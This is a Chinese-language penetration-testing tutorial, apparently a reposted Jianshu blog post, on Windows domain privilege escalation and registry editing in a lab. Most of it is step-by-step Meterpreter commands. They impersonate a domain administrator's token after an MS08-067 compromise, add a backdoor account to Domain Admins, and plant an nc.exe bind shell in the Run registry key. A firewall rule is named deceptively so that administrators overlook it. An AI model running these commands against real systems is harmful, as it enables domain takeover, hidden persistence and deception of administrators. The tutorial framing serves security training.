域环境提权、编辑注册表

Token(令牌),域环境中提权

用户每次登录时,账号绑定临时的token;

访问资源时提交token进行身份验证,类似于web cookie。

Delegate Token:交互会话登录,(例如直接登录、远程桌面登录)

Impersonate Token:非交互登录,(例如访问文件共享)

注意:在域环境中,Delegate Token账号注销后变成Impersonate Token,权限依然有效。所以攻击者一旦获取域管理员的token后,危害极大!

实例:server 2003是域控制器,XP加入到域。

首先使用ms08-067漏洞,获得XP的system权限;

然后在域控制器上访问XP的文件共享(\\192.168.80.44\c$),建立一个administrator用户的Impersonate Token;

meterpreter > load incognito

meterpreter > list_tokens -u

meterpreter > impersonate_token LAB\\Administrator  将自己伪装成LAB Administrator用户 (注意命令中是两个\)

meterpreter > getuid  发现自己现在是域管理员

Server username: LAB\Administrator

meterpreter > execute -f cmd.exe -i -t  获得交互shell,-t(使用当前假冒的token执行程序)


C:\WINDOWS\system32>ipconfig /all  查看XP的DNS服务器,即域控制器的ip地址

meterpreter > add_user coleradmin Coleradmin1! -h 192.168.80.11  添加用户

meterpreter > add_group_user "Domain Admins" coleradmin -h 192.168.80.11  给予域管理员权限


编辑注册表

注册表的渗透测试中的常见用途:修改、添加启动项;窃取存储在注册表中的机密信息;绕过文件型病毒查杀。

实例:编辑注册表,添加nc到系统启动项中,形成后门程序。

meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32  将nc.exe上传到目标主机

meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  枚举注册表的键值

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'  在当前主键下增加一个nc键值

meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc  查看nc键值

在重启之前,首先要设置防火墙允许444端口通过。

meterpreter > execute -f cmd -i -H  最好加上-H参数,不然在目标主机上会弹出cmd窗口

C:\Windows\System32> netsh firewall show opmode  查看防火墙的状态

C:\Windows\System32>netsh firewall add portopening TCP 444 "网络发现(Pub PSD-Out)" ENABLE ALL  添加防火墙的规则允许444端口通过(这里“网络发现(Pub PSD-Out)”是规则名称,这样写是为了迷惑管理员。)

目标主机重启后,在Kali上使用nc连接它,获得shell。

root@kali:~# nc 192.168.80.33 444



作者:Instu
链接:http://www.jianshu.com/p/906832a08a46
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

你可能感兴趣的:(渗透测试)